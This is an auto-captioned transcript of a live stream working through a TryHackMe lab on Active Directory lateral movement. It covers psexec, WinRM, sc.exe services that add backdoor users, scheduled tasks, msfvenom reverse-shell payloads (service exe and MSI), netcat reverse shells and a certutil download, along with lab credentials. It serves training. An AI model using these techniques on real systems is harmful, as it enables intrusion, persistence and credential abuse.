Lateral Movement - Part 1 [Active Directory Hacking] -- TryHackMe LIVE!

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

[Music] [Music] [Music] [Music] [Music] [Music] [Music] [Music] [Music] [Music] [Music] so so boom and we are live what is up everyone tyler ramsey here back with another video uh whether you're watching this on twitch uh as it happens after the fact or catching me later on my youtube channel i just want to say it's an honor to have you hang out with me we'll be on for the next i don't know hour and a half to two hours and we are gonna do some live hacking and just learning hands-on cyber security stuff what we are going to do for this stream is try hack me release the most recent uh active directory network for lateral movement and pivoting and the only thing i've done so far is i started the network and amoeba man is on discord with me and he is a staff member to try hack me and he told me this one might be broken so we're gonna see what happens we'll do some live troubleshooting on the spot but like i said i have not really even looked at this so we're gonna go into it fresh so i would encourage you to follow along with me if you would like the way you can get here is if you go to the hackme website the easiest way is we have new rooms right here and we have this lateral movement and pivoting so if you click that go ahead and start the network because it takes a little bit of time to get everything going that's the only thing i've done up to this point and you are welcome to use the attack box if you want i prefer to use my own vm i think it helps with just learning troubleshooting and figuring things out and i'm going to go ahead and make a directory on my kali linux machine for this room and see if we can get things organized i am just gonna call it we'll just call it pivoting so i'm gonna open this up make directory pivoting if i learn how to spell and should be empty perfect so uh let's go ahead and dive into it and what i like to do when especially when i do this live is take it slow right the goal is not to rush through the goal is to learn um as we do it so let's take it slow let's read all of the text and see what we can learn i'm gonna go pull up twitch over on the side here so i can monitor the chat on here so the couple of you joining on twitch welcome those of you on discord good to have you as well so in this room we will look at lateral movement a group of techniques used by attackers to move around the network while creating as few alerts as possible we'll learn about several common techniques used in the wild for this end and the tools involved it is recommended to go through bridging id and enumerate ad rooms before this one and i have already did both of those i think i did both of them in two parts you can catch those on my youtube channel you can get to that on twitch if you go to about or just go to youtube and search for tyler rams but you should be able to find my page on there but you are welcome to do those and follow along with my video if you so choose so our learning objectives for this series of for this room familiarize yourself with the lateral movement techniques used by attackers learn how to use alternative authentication material to move laterally and learn different methods to use compromised hosts as pivots and once again i'm going to adjust my headphones there we go just adjusting the mode on them all right connecting to the network this might be the most confusing part um let's see if we can make our way through this if you're using web based attack box we're not blah blah blah i'm still gonna glance through here we are not using the attack box if you are i encourage you to read that i'm assuming we're going to set this up similar how we set it up before uh dns blah blah you should take the time to note your ip other host if you're going to use your own attack machine that is awesome open vpn config file we've been generated for if once you join the room go to the access page and i'm going to have to do this on my vm so let's go ahead and go here and just like all the other networks you have to download a separate uh vpn file so just know that when you do networks you can't use your normal try hack me vpn file the networks are each going to have a separate vpn file to get you on that network why is it making me do this those are the chimneys i promise you i'm not a robot it's really me come on try hack me i believe in you thank you okay so you click networks over here and lateral movement and pivoting let's go ahead and download the configuration file save perfect and we'll just do open vpn home kali downloads and there it is so far so good let's call this terminal for now and see what our ip is i believe that's going to be our ip for this room yeah lateral movement you can see the name right there so that's our ip let's go ahead and see we probably add something to our uh etsy host file would be my guess or maybe our dns let's see what we need to do so we use the openvpn client we did that we did that i guess we could verify that we have access here as it says change the lateral movement and we do yep so all that is good you still need to configure dns summary of what was shown above it's important to note that although not used the dc does log dns requests so we're going to use cali we're going to use our network manager and we're going to set our dns to i'd assume the domain controller right there so that is the 10.200.80.101. so let's go ahead and do that and the way you can do that is with the gui you can just do advanced network configuration here's our wired connection go over to ipv4 settings and we can add additional dns server i should turn num lock on and i already forgot the ip after literally just looking at 10.200.80.101. okay 10. hit save close that out then we have to restart it which i believe is system ctl restart network manager that will just take a second make sure we have a connection there cool so we have a connection to the internet and then there was a command we can run to verify that we connected to the dns which is let's go and try to ping this host it says so let's give that a shot shoot oh i think it was going i was just impatient hold up yep just being a little bit slower but we did get uh reply back so that is a good sign see if there's anything i missed there we can do the ns look up so we can also verify it this way to make sure the dns is working which it should be there we go okay first step is done we were able to get on the network if you were stuck on that part just slow down and read through this the only reason i kind of sped through it is i've done this a few times now all right requesting your credentials to simulate an ad breach you will be provided with your first set of ad credits and what i'm going to do right now is just go ahead and get a side-by-side view so attack box kind of does this automatically but we're going to make our own little side-by-side view if my computer doesn't freeze in the process this does kind of screw up some of the formatting in your cali box i've noticed when you run command so we'll see how it goes okay the simulated breach you provided with your first set of ad credentials once your networking setup has been completed on your attack box navigate to there to get our credential pair so let's go ahead and do that and the reason for that is of course is simulating after you got that initial low level ad user oh apparently it didn't copy let's try that again okay how about copy link there we go so this is like we had a successful phishing email uh compromise so we got some low-level creds so here are our creds and what we'll do is we'll go back to here and we'll just echo those creds and we'll just call it creds.txt so we have them right there okay dissimilar 80 breech blah blah blah the credential pair will provide you ssh access to the jump box can be seen as a jump host in the environment simulate a foothold that you have achieved for ssh access you can use the following command and we are jenna.field at thm.tryhacme.com yes password income 1982. all right so far so good let's just rename this our shell a note on reverse shells if you're using the attack box which we're not um let's see for convenience it's called that or movement so if using attack box read this we're not using it so i'm going to keep moving moving through the network okay what is lateral movement simply put hey actually you know what i need to start our timer i try to do this in 25 minute intervals and take five minute breaks that's also how i do my normal work day as well i think it's just healthy and during the five minute break get up walk around so timer has started we are officially starting let's do this so what is lateral movement simply put lateral movement is the group of techniques used by attackers to to move around a network and yes nate i agree once an attacker has gained access to the first machine of a network which we have here is our jump box moving is essential for many reasons including the following reaching our goals as attackers bypassing network restrictions establishing additional points of entry creating confusion and avoiding detection while many cyber kill chains reference lateral movement as an additional step on a linear process it is actually part of a cycle during the cycle we use any available creds to perform lateral movement giving us access to new machines where we elevate privileges and extract credentials if possible with the newfound credits the cycle starts begin the cycle starts again so we have our initial recon so in this simulation that is done our initial compromise that is done our established foothold that's kind of done we have this ssh foothold what we're going to work on is a essential escalate privileges internal recon move laterally maintain presence and we keep we keep going through this cycle until we complete our mission usually we'll repeat the cycle several times before reaching our final goal on the network if our first foothold is a machine with very little access to other network resources we might need to move laterally to other hosts that have more privileges on the network a quick example suppose we are performing a red team engagement where our first goal is to reach an internal code repository where we got our first compromise on the target network by using a phishing campaign usually phishing campaigns are more effective against non-technical users so our first access might be through a machine in the marketing department marketing workstations well i bet anyone who's watching this who might be in marketing just got offended marketing workstations will typically be limited through firewall policies to access any critical services on the network including admin protocols database ports monitoring services or any other that aren't required for their day-to-day labor including code repositories to reach sensitive hosts and services we need to move to other hosts and pivot from there to our final goal to this end we could try elevating privs on the marketing workstations and extracting local user password hashes maybe like crack map exect i think would do something like that if we find a local admin the same account may be present on other hosts after doing some recon we find a workstation with the name dev we use a local admin password hash so we're passing a hash attack and confirm it's owned by one of the developers in the company from there access to our target code repositories available so we got our marketing pc we did that through internal recon we did a pass the hash attack and then we got to the code repository notice that while lateral movement might need to be used to circumve firewall restrictions it is also helpful in evading detection in our example even if the marketing workstation had direct access to the code repository it is probably desirable to connect to the developer's pc this behavior would be less suspicious from the standpoint of a blue team analyst checking audit login audit logs the attacker's perspective there are several ways in which an attacker can move laterally the simplest way would be to use standard administrative protocols such as winrm rdp vmc or ssh to connect to other machines around the network this approach can be used to emulate regular users behavior somewhat as long as some coherence is maintained when planning where to connect with what account while the user from it connecting to the web server via rdp might be usual and go under the radar care must be taken not to attempt suspicious connections like yo why is the local admin connecting to the dev from the marketing pc attackers nowadays also have other methods of moving laterally while making it somewhat more challenging for the blue team to detect what is happening effectively while no technique should be considered infallible we can at least attempt to be as silent as possible and the following task will look at some of the most common lateral movement techniques available suite administrators in uac or user access control or performing most of the lateral movement techniques introduced throughout the room we will mainly use admin creds while one might expect that every single admin account would serve the same purpose a distinction has to be made between two types of administrators local accounts part of the local admin group and domain cards accounts part of the local admin group the differences we are interested in are restrictions imposed by uac over local admins except for the default administrator account by default local administrators won't be able to remotely connect to a machine and perform administrative tasks unless using an interactive session through rdp windows will deny any administrative tasks requested via rpc smb or winrm since such administrators will be logged in with a filtered medium integrity token preventing the account from doing privileged actions the only local account that will get full privileges is the default administrator account domain accounts with local administrator privileges won't be subject to the same treatment and will be logged in with full administrative privileges the security feature can be disabled if desired and sometimes you will find no difference between local and domain accounts in the administrators group still it is essential to keep in mind that should some of the lateral movement techniques fail it might be due to using a non-default local admin where uac is enforced you can read more details about the security feature here it just brings us up to microsoft docs all right spawning processes remotely drink a water first this task will look at available methods an attacker has a spawner process remotely allowing him or her to run commands on machines where they have valid creds each of the techniques discussed uses slightly different ways to achieve the same purpose and some of them might be a better fit for some specific scenarios ps exec uses port 445 over tcp requiring group memberships is administrators ps exec has been the go-to method when needing to execute processes remotely for years it allows an administrator user to run commands remotely in any pc where he has access i use this all the time in my job i was actually messing around there a little bit right before i went live on stream for work ps exec is one of the many sysinternal tools that can be downloaded here the way ps exec works is as follows connect to admin share upload a service binary psex uses psxservice.exe is the name connect to the service control manager to create and run a service name ps exec service and associate the service binary with this create some name pipes to handle those things so we have this we upload a service executable to this admin share essentially the attacker creates an execute service and then we communicate through pi ps exact and that's our name pipe to run ps exact we only need to supply the required administrator credits for the remote hosts and the command we want to run psx64.exe is available under tools and thm jump for your convenience let's go ahead and just navigate to that and oh we got sharp hound we got netcat we got mimi cats sweet all right um so are we are we just supposed to do that to run yeah i suppose so what computer are we attacking if we are on our jump box are we maybe just showing us the syntax oh let me let me scroll down to run ps exact we only need to supply the required administrators blah blah blah and thm jump 2 for your convenience so i think it's just showing us the syntax for that so you can see we're running ps exec 64. that's the machine ip if we're launching a certain computer running as you as administrator there's our password and we're launching command.exe it's just a command prompt remote process creation using winrm here's the port for that 59.85 over tcp that's http and then of course https is 5986 required group memberships remote management users windows remote management winrm you may have also heard of evowinrm on cali is a web-based protocol used to send powershell commands to windows host remotely most windows server installations will have winardem enabled by default making it an attractive attack vector to connect to a remote powershell session from the command line we can use the following command and i don't see the tool here but you're running that you're specifying your user specifying your password and then what we're launching we can achieve the same from powershell but to pass different credits we will need to create a ps credential object interesting so for powershell we're setting a variable for our username we're setting a variable for our password and secure password convert to secure string that's just going to be the asterisk type stuff password is plain text credential another variable new object system management automation ps credential username secure password so we're just taking the things our variables from up there and passing it there once we have our ps cred object we can create an interactive session using the enter ps session commandlet and if you've never done that it's kind of like an ssh connection but through powershell so um if you're a system admin you probably use this pretty often i do it often just to poke around on computers so i'm trying to figure something out because the end user doesn't detect at least not very easily that you're open a ps session on their computer powershell also includes the invoke command commandlet which runs script blocks remotely via winrm credentials must be passed through a ps credential object as well this is if you have a specific so you can run a script block here you can also if there's a script that you're using like i don't see any of these a script i know there's a sharp hound.ps1 you can actually pass actual scripts as well i think it's slightly different syntax but it's a very similar process remotely creating services using sc here's our ports for that you can read those through those on your own require group memberships administrators windows services can also be leveraged or an arbitrary command since they execute a command when started while the service executable is technically different from a regular application if we configure a windows service to run any application will execute it and fail afterwards we can create a service on a remote host with sc.exe might be so cat there i don't know so i think ac and the schedule task one and the one rs one are still defaults of um we know so they're native binary so if you run ac that should work perfect i'll just do that yeah so show me the help file there oh let's say windows services blah blah we can create a service on a remote host sc.exe oh yes i should just keep reading when using sc it will try to connect to the service control manager remote service program through rpc in several ways number one a connection attempt will be made using dce rpc the client will first connect to the endpoint mapper or epm at port 135 which serves as a catalog of available rpc endpoints and requests information on the service ctl service program the epm or endpoint mapper will then respond with the ip and port to connect to that which is usually a dynamic port in this range dynamic means it's going to change depending like on when you make the connections different each time so here's our client where is servicectl the epm on port 135 to the server it says hey it's on port 50123 and then we do the rpc bind if the ladder connection fails sc will try to reach service ctl through smb named pipes either on port 445 or 139 which is smb or smb over net bios you can see that there we can create insert a service name thm service using the following commands and maybe i'll just try this i don't know if we need to exe so if we do service and then i mean our target so i should ask you about man are we supposed to be running these commands on one of these machines or is this just explaining the syntax right now so it's it's explaining the syntax for you and then what's going to happen at the end there's going to be a section where let's let's do the work now um and technically you can choose to do any of the techniques explained in the room to do that so it's about all of them almost doing the same thing but you would use a different one based on your specific attack so for example if some of the ports are faulted on a host-based firewall then you can't for example move via service creation then you might choose to move through something like a scheduled task or through a powershell session so it's about teaching you the different techniques and then you can decide which one is going to be based based on the specific circumstances that you are faced with on your assessment okay cool what we'll probably try to do is we'll just do every single one we'll learn each one so we'll redo it and then when we get to that part we'll just see how many we can do uh creating schedule tasks remotely oh let's see so i was here we create okay this is just showing how to start a service name thm service using the following commands right so we have sc.exe our target create thm service so the name of the service the bin path net user oh so we're creating the user or create giving the password adding so we're creating a service that essentially is adding a user to have like a backdoor account to establish persistence start means auto i suppose every time the computer turns on it it's starting that up or when the service starts i should say it's gonna it's gonna run that sc.exe target and then we're gonna start the service and then when the service starts it should create the monroe user with that pass the net user command will be executed when the service has started okay just like how i explained it as i was looking at it to stop and delete the service we can then execute the following commands of course you'd want to do that to clear up your tracks creating schedule tasks remotely another windows feature we can use a scheduled task you can create and run one remotely with scheduled tasks available in any windows installation to create a task name thm task 1 we can use the following command schedule tasks slash s target ru system create schedule task tr command payload to execute so you could so then you're specifying like how often to run so you could run a scheduled task that i suppose pings back to your attack system you could use this to probably establish some type of shell and that's running the task we set the scheduled type sc to once right there which means the task is intended to run only once at the specified time and date since we will be running the task manually the starting date sd and starting time won't matter anyways okay so doesn't matter what you put in there since the system will run the scheduled task the command's output won't be available to us making this a blind attack finally to delete the scheduled task we can use the following command and clean up after ourselves all right let's get to work let's get a drink of water a lot of reading to complete this exercise you will need to connect the thm jump to which we should still have our connection here i know that if sometimes if your network's not working the networks do time out after a certain amount of inactivity so if yours doesn't work and try to restart it or every once in a while just type a command here so you can ping the network all right to complete this exercise you'll need to connect to dhm jump 2 using the credits assigned to you we've already done that if you haven't done so yet click on the link blah blah once you have we've done that for this exercise we assume we've already captured some credits with administrative access okay so those are going to be our creds we'll show you how to use these credits to make to move laterally the thm iis so that's going to be like the web server using sc.exe feel free to try the other methods as they should all work against it so let's just glance real quick one more time at how this network is set up so we are on this jump to box right here and we're going to connect to this which i'm guessing is a web server would be there's some type of web server uh let's see here we are well below we've already shown how to use sc to create a user on a remote system by using that user we can also upload any binary we'd like to execute and associate it with the created service however if we try to run a reverse shell using this method we will notice that the reverse shell disconnects immediately after execution the reason for this is that service executables are different to standard.exe files and therefore non-service executables will end up being killed by the service manager almost immediately luckily for us msf venom supports the exe.service format which i don't think i've ever used which will encapsulate any payload we like inside a fully functional service executable prevent it from getting killed very cool i'm just gonna navigate to my folder here on my attack box all right to create a reverse shell we can use the following command note since you will be sharing the lab with others you'll want to use a different file name for your payload instead of myservice.exe okay that makes sense um to avoid overriding someone else's payload okay sounds good so msf whoops msf venom dash p for essentially type of payload we're gonna do windows shell reverse tcp dot f for file and it looks like we have the file type of exe service l host this is going to be your attacker ip i don't remember mine you know i should i should be like cool kids just ipa is the the new way to do this kind of thing on something new that i never knew don't copy your ip copy the word lateral movement sure actually works i never actually knew that but you can use that and it will automatically resolve the id for you sure good i kind of knew that in the back of my head but i never do it but it makes a lot more sense it saves on human error and anything that can save my human errors is good we'll use port 444 that's a standard msf venom or metasploit port of course if you're doing this on a real assessment you probably don't want to use the port that is like always blocked by firewalls but we'll do it here dash o for what we want to call it and it said don't call it myservice.exe so i'm going to call it hacksmarter.exe and once again if you're kind of new to this you'll notice i'm doing this on my attack machine and here's the victim machine so once we do it on the attack machine we will transfer it over to our victim i'd assume let's see we'll then proceed to use the t1 leonard summers credentials to upload our payload to the admin share of thmiis using smb client from our attack box we got five minutes left y'all just so you know if you're waiting for that break uh using smb client from our attack box okay cool once our payload is created and we're going to set up a listener so we'll just go ahead and get that started as well let's open that and do we have it there there it is hacksmarter.exe so smb client if i can spell dash c put hacksmarter.exe we're going to specify our user t1 which probably means that tier one admins this is a low level admin account but some administrative privileges dash w za.tryhackme.com must be the domain there and whoops you can always copy and paste this but as i always say i like to just type because it helps me learn the syntax and it's not as brainless that way i think you learned a little better when you type it and make mistakes as you type it which you'll probably see me make mistakes looks like our password is easy pass forever i think they'll make that my real admin password for work it's a good password oh was that the password yeah easy pass forever okay let's see what happens okay while that works or breaks one of the two let's go ahead and use exploit multi handler i believe options so we should be able to set our l host to lateral movement i think that's what it was called yep so you can see it set right there we have all port four four i always like to set the payload to match um what i do here oh yeah and it has to do it there i just know sometimes i mean sometimes i'll catch it even if you don't set the payload but i've noticed sometimes it also won't but when i set the payload it just seems to work better so they have us in the lhost oh look at that they did lateral movement as well and then set the l port which is already set for us we set the payload and then we can just run that and we'll just call that interpreter we'll hope that we get that and go back to here this doesn't seem to have worked i might try to run it again see if i missed anything what's this out you can run the following one line on your linux console do the same nt status connection reset i wonder if i did something wrong let me just look at my syntax here smbclient.c put hacksmart.exe ut1 leonard summers d z8 tryhackme.com we have that which should match the server we could i mean what we could try i'd assume we'd be able to do the actual ip here let's try that whoops i don't know if this will go any smoother or not maybe it's just not resolving the name for some reason well or it's because i have the password right there on the end there let's try that if that doesn't work i'm gonna hey so for those of you watching if you ran into that issue try to just replace the name right there with the direct ip maybe that's just a little bug or i did something wrong but either way that seemed to have done it let's look down here alternatively you can use the following one line on your linux console do the same oh cool so then i have to wait for msf console to open i didn't know that trick either actually i think i saw nate do this didn't you do this the other day nate is he still on here oh no he's not i think i saw him do it now that i think of it all right since sc.exe doesn't allow us to specify creds as part of the command we need to use run as to spawn a new shell with t1 leonard summer's access token still we only have ssh access to the machine so if we try something like that the new command prompt would spawn on the user session but we'd have no access to it to overcome this problem we can use run as to spawn a second reverse shell with t1 leonard summer's access token you know what i'm looking at our timer we have just 20 seconds i think this might be a good good break point so i'm gonna go on break i'm gonna step away from my computer and i'm gonna actually stop my timer quick we'll stop that uh let's take a five minute break step away from your computer walk around jump up and down do whatever you want and we'll be back in exactly five minutes so [Music] [Music] [Music] hey what is up everyone welcome back to the live stream let me get twitch pulled back up and then we will dive back into things oh nate's just watching on twitch yes i use dash key dash a bit yes oh shoot oh i'm not mute for you um one second sorry i was only on mute for you it's coming over twitch i just forgot to unmute it on discord thanks yeah thank you all right let me go ahead and share my screen and we'll pick up where we left off okay so we were gonna spawn reverse shell as the t1 lender.summers and i was kind of curious about that because the last time we used the run as i don't remember if it's one of these networks or if it was elsewhere we had to rdp in order to get to work because if you have an rdp session then you can do that because it will spawn it but you can't do it as ssh blah blah blah to overcome this problem we can use ronin to spawn a second reverse shell with t1 leonard summer's access token very cool i've never done that before so oh we got to go this is gonna be in our victim machine make sure we still have a connection here that we do so run as net only user z a dot tryhackme.com that's our domain t1 leonard.summers c well the case doesn't matter tools there's oh shoot i didn't accidentally hit enter can i go up okay cool toolsnetcat64.exe e we're going to launch command and now we want our ip and so that's that right there i don't think the lateral movement trick will work on on this part maybe yeah i don't think it would in my head it doesn't work oops so like that's only going to work on our local machine come on so we have that and it looks like we're doing port 443 so it's going to get our listener set up i mean just simple netcat listener like that close oh this is called this terminal okay let's check our syntax four four four three let's close our quotation there and see what happens enter the password that was like that easy pass something super easy pass or something easy pass forever easy pass forever what did i do wrong there i should have launched it as leonard so just quickly there you did nothing wrong there right if you look at that runner's command one of the flags you have there is net only um and if you remember from the enumerating 80 network right the net only flag is a very special flag because essentially what it does it still launches in the normal user context for you because for instance that t1 leonard summers user might not have the ability or the permissions to actually log into the host that you're currently logged into so it just passes it and it means that it will now use those credentials for network only connections so now when you run a command while it looks like you're running it as general field it will actually execute as the lynette summer guy and then one thing that i see that wasn't mentioned here is um it might be good to test whether or not you specify that password correctly because remember nate only will take in any password that you give it because it's not verifying the account anyway um so in your other terminal if you wanted to you could just run a dir on the sysvol directory um to just basically make sure that it works so that would just be your dir and then backslash backslash say they.tryacme.com sysvol and if that works you know that the password was correct and if it wasn't um it will actually tell you that the password is incorrect so yeah credentials are working okay cool that's that's good yeah that would be that'd be helpful to explain on here maybe they maybe they explain that maybe they don't no i don't think they do but that that makes sense now that you say that it's kind of clicking in my head i remember i remember that being explained in what was that was probably is that enumerating a d a breaching a d obviously it was one of those i still remember which one all right the new command would spawn on the user session but well let's scroll down we already did that finally proceed to create a new service binary remotely by using sc associated with our uploaded binary okay so we need to go ahead and grab that binary down so we could go to see probably go to like whoops didn't mean to do that should be a temp folder yeah we probably have right access to there so if you see anyone else nope they haven't done it so there's multiple ways you could transfer this over here what i'm going to do is just the standard python web server so python 3-m http server will keep it at port 80 and then we can use something like cert util to grab that we'll see if i remember the the syntax by heart cert you tell url cache dash f i think http 10 dot whatever my ip is right there i have my try hack me ip memorize i just don't quite have this one memorized yet try that and then we called it hacksmarter.exe i think and i think you have to do outfile maybe i may have totally messed up that syntax yep i think i did quick note why are you trying to copy that file over to workstation oh i already did it yeah i don't know why i'm trying to i did it with the this is what happens i took my five minute break we already did that with the smb client thank you good catch it's already in the absence here yes and a note here as well the nice thing is you do have ssh as well which again i like that you're testing cert util because you won't probably have ssh out there but scp copy um sometimes makes life easier but yes for real world cases search youtube is probably going to be the thing that works every time i use scp copy i always have to look up the syntax for that i don't know why i know cert util better probably just because i've used it more in ctfs but all right let's see where we're at create a new service remotely by using sc so let's go ahead and give that a shot and that's just the so there's a chance because this this didn't work before with the name so if this doesn't work you may just have to specify the ip on it but we'll do create thm service three two four nine bin path and here is what we did let's just try this so wind directory how they want us to do it i think it would be probably the admin one i think is just specify and do the win directory there i think i don't know let's find out we'll try both just a note there um you just need a space for your bin path um ac is very very peculiar about where it spaces is and i think it's because you have the screen and split screen and that is not showing the spec probably yes and then when the specifier see windows which i'm pretty sure that admin share automatically places inside the windows directory if you do something like smd client gotcha cool so if we do hack smarter.exe start equals and there's that space i do see that space start equals auto and so that just means it's going to start automatically we run the service let's try that see if anything breaks open sc manager failed okay let's uh glance at my syntax we may just change the ip over i have this bad shell um let's let's try to do it by ip so that's 10.200.88 create thm service 3249. then path equal space lender packsmarter.exe start equals auto oh the specified service already exists unless somebody else made the service on the machine um we'll just try to run it and if it doesn't we'll just rerun that and use a different name for the service unless it did create it the first time okay be sure to change the name you oh okay let's try to redo that and change the name of our service i bet someone else already made it specifically says to change the name of your service which would make sense thm service i'm gonna call it hack smarter service we'll just call it hack smarter 3249 bin path equips equals space rotation winder i just realized i never started my timer i always forget to do that crap let me start my timer there we go okay winder that hacksmarter.exe start equals auto create service success wait so once again if you guys are watching this after the fact it doesn't work the first time to try to specify the actual ip that seems to get past that that just very minor bug be sure to change the name of your service once you have started the service you should receive a connection in your attack box i think we still yep we still have that running because that should be on that port 444 and i think it's just sc start service if we scroll up i know the syntax was up here yeah sc.exe stop i see exe target start thm service i don't think we need target so remember you're trying to remote spawn a service right if you just type ac start it's trying to look for local servers which is why we we always start there but just maybe check i think it might not work because i think you have a typo there for your windows directory but start it see if when dr also works for windows directory i'm interested to see let's find out so our target is going to be this i'm just going to do the ip as well since it wasn't working before so we should be ses dxe the sc.exe start and then we should just be able to specify our service that we created which was the hack smarter thing start service open the file name directory name a volume label let's try this i think that's the windy r1 that's that's fade that's my issue oh but also yeah just make sure it should be 201 let's see you specify 21. oh i typed the ip wrong there i did okay let's go back and retype our stuff let's go here if i can just scroll up and see what i did wrong oh yep i see i see i see so let's let's retype it practice makes not perfect and we're going to specify the ip and we're going to create we'll call it we're created a hack smarter so we're going to call tyler wins we'll call that the name of the service bin path equals space quotations w-i-n-d-i-r that and um am i looking yeah doing the right thing if i get the correct backslash here create tyler wins blah blah and this is gonna be our hacksmarter.exe start equals auto glance at this sc.exe create tylerwinds3249 bin path winder hacksmart.exe start equals space auto let's try that create service success okay so far so good and now if we do our sc.exe start we're going to specify our path because it's remote 201 and now this is called tyler wins just swap that start and that ip around i don't know if it makes a difference but just follow this turn broke it scroll back up over here i guess if my scroll here doesn't work 10.200.80.201 start start and then we called it tyler wins let's just make sure i type that stuff correct since i checked this up okay i mean i think you named it tyler wins three two four nine ah let's try that [Applause] [Music] hey look at that we have an interpreter show hopefully [Music] nt authority systems that's like the root equivalent on windows so we do a few more but we just got something done after running the flag.exe file on t1 leonard's desktop on thmis what is the flag well we'll find out geez i can't type tonight [Applause] moving with services all right let's keep moving hey what up hunter boss sorry to even see you tight this hunter boss said on twitch's new network looks great yeah it's interesting as long as you don't make silly mistakes it's it's like a lot of content packed in here though i love it all right moving laterally using wmi we can also perform many techniques discussed in the previous tasks differently by using windows and management instrumentation wmi is windows implementation of web-based enterprise management and enterprise standard for accessing management information across devices in simpler terms wmi allows administrators perform standard management tasks that attackers can abuse to perform lateral movement in various ways which we shall discuss connecting to wmi from powershell before being able to connect to wmi using powershell commands we need to create a ps credential object with our user and password this object will be stored in the credential variable and utilized throughout the techniques on this task are we actually using this as our account just glancing through here i think we are oh that's complete see oh that might be our countdown there okay we'll scroll back up we'll read through this so we already went through that once we'll proceed to establish wmi session using either the following protocols dcom rpc over ip will be used for connecting to wmi this protocol uses port 135 and those ports just as explained with using sc.exe wsman win rm will be used for connecting to wmi this protocol uses these ports and that port to establish a wmi session powershell we can use the following commands and store the session on the session variable which we will use throughout the room on different techniques opt variable new ciem session option protocol dcom and then we're setting a session variable new cim session our computer name it's going to be our target that's going to be the ip that we're connecting to in this context because the that seems to be the easiest credential we're just pulling down uh the credential variable from up there session option opt interaction stop the new cim session option command is used to configure the connection options for the wmi session including the connection protocol the options and credits are then passed to the new cim session commandlet to establish a session against a remote host remote process creation using wmi we have these ports require group memberships administrators again i feel like no is this correct i feel like i read this already i read some of it i think um blah blah are then passed okay we can remotely spawn saying wmi request to the 132 process class to spawn the process under the session we created before okay interesting so here's our command of course we're doing powershell command set content path value monroe is here okay so in this we're just essentially touching the file invoke command session class name method arguments command line equals command notice that wmi won't allow you to see the output of any command but will indeed create the process silently so you could you know create your own output like that on legacy systems the same can be done using wmic from the command prompt which i have used that before at some point in time creating services remotely with wmi we can create services with wmi through powershell to create a service called thmservice2 we can use the following command okay glancing through this so there's the name display name path name oh so this is a service that's going to create that monroe account kind of backdoor user start service start mode manual and then we can get a handle on the service and start it with the following commands name so service blah blah we're going to filter name like thm service 2 that matches up there and vote command input object start service fine we can stop and delete the service following commands clean up after ourselves creating schedule tasks remotely with wmi we can create and execute schedule tasks by using some command that's available in windows default installations payload must be split in command in arguments so okay i see so command and argument that's doing that same thing we're creating a user with that password and we're adding them new schedule task action session execute command action user nt authority system so you know instead of this we could run we get a reverse shell there's our task name delete let's go skill test after it's been used we can use the following command installing msi packages through wmi msi is a file format used for installers if we can copy an msi package to the target system we can then use wmi to attempt to install it for us the file can be copied in any way available to the attacker once the msi file is in the target system we can attempt to install it by invoking the 132 product class or wmi we can achieve the same by using wmec and legacy systems okay let's get to work let's do it all right we're the ssh we can close out leonard here interpreter we can close this out we'll probably have another one so we'll just leave that open for now what's this that's our python shell we don't need that right now either kind of start fresh start over go back to jenna make sure we still have a connection we do all right for this exercise we'll assume we've already captured some credits with administrative access so another tier one admin kareem 1994 very strong password we'll show you how to use these credits to move laterally to thmis the web server using wmi and msi packages cool feel free to try the other methods presented during this task we will start by creating our msi payload with msf venom okay from our attacker machine since you'll be sharing the love with others you'll want to use a different file name of course dash p windows x64 shell reverse tcp l host lateral movement l port looks like we're changing it up four four four five dash f file type msi and we will call it hacksmarter.msi i'm just gonna set this as well that's what we set it to right yep oh wait no we need to change the payload change that payload i made that mistake and had a running um payload that i couldn't use anymore so it's very annoying yeah i caught that right right when i hit run make sure i type that right yeah there we go okay we'll copy the payload using smb again there is our hex smutter.msi we'll copy the payload using sm smb or any other method available so we're putting the admin share again so let's just do smb client dash c put packed smarter dot msi dash u we're using t1 kareen waters dash w z a dot try hack me tryhackme.com and then i'm gonna specify the ip again just because that seems to work better 10.200.80.201 and i believe it was just admin or something let's double check here we go yeah oh slightly wrong there admin like that and then it's gonna take the password there but it's gonna prompt us again dot 1994 since we are cop maybe i did something wrong there maybe i'm typing the ip wrong oh do my network break 10.200.80 just hit refresh oh nate network might have stopped i look at that extend timer yeah so just refresh it quickly then the start button will be available again i think you might have pricked it now by clicking extend when the network was flying let's see we'll just see what happens i'll give it a second i don't know if it's gonna work but what you can do is you can try some lead hacking by doing inspect elements and just enabling the start button and trying to press it and see if that will start your network i don't know if it actually works if you press like extend and then after sort of the network has stopped it's something that the front-end developers need to fix because it needs to update your user interface to show you that the network has stopped which i don't think it does sure i mean so and i can't reset it can i because you need five votes to reset it sadly yes this is definitely a brick on the on the front quickly just to inspect elements on that button i think i saw that disabled liner there that you can just remove and see what i happens it's like the yeah just double click that one and delete that inside thing let's enter and i'll press it okay your network starting let's let's hope it happens that's fantastic i never would have thought to try that at all we'll give it some time to to do its thing you can even just run a ping while we wait and i guess what i could do is we have a few a little bit of time before our next five minute break but this might take five minutes or so to launch up so we're gonna take an early five minute break i'll come back in five minutes and we'll see where things are at it's actually almost midnight my time when i when i call it call it a day but we'll see if we can make it through this next part so i'm gonna take a quick five minute break i'll come back in five minutes and we will see where things are at so i shall be right back [Music] do [Music] so so my all right what is up everyone i am back after breaking my network i just think it still might be broken let's see just quickly run a end map of that host um instead of a ping i don't know if there might be a firewall that prevents the rest of it and you just do like um oh yeah dashby uh yeah but dash b for port 22. okay yeah it's finding it open so yeah that lead hack did actually work that is awesome and we have to get signed back in jenna it looks like well we can we can try this first thought we were trying before here we go because this should still work hey okay let's go and throw this to the side grab this we'll go like that i'm guessing we have to sign in as jenna so let's well we could sign in all right we're not taking a short break we're gonna we just took our short break scroll back down to where i was at so we copied it to our admin share we start a handler to handle that which i did do that let's start wmi session so we're gonna start up powershell so we're going to ssh jenna.field.thmgmp2dojacme.com income 1982 all right get powershell open and now we're just specifying everything that was up there so username it's going to be t1 caring.waters that password is going to be corrine 1994. see if i mess up the syntax as i type it secure password equals convert to secure string password as plain attacks force so far so good new case sensitivity doesn't really matter system dash management dash automation dot ps4 credential username secure password equals new cim session option protocol that just looked wrong to me calm session equals new cim session computer name so i'm going to grab the ip again 10.200.80.201. credential our variable that we created session option other variable created air action stop if i really typed all of that without a typo i'm going to be in awe we then invoke the install method from the win32 product class to trigger the payload very interesting let's give it some time to do its thing i got no errors that's that's amazing especially at midnight invoke cim method cim session session class name when 32 product method name install arguments package location equals c windows called it hack smarter.msi i believe options equals make sure i have the spaces correct here i think i do user space equals space false so we're 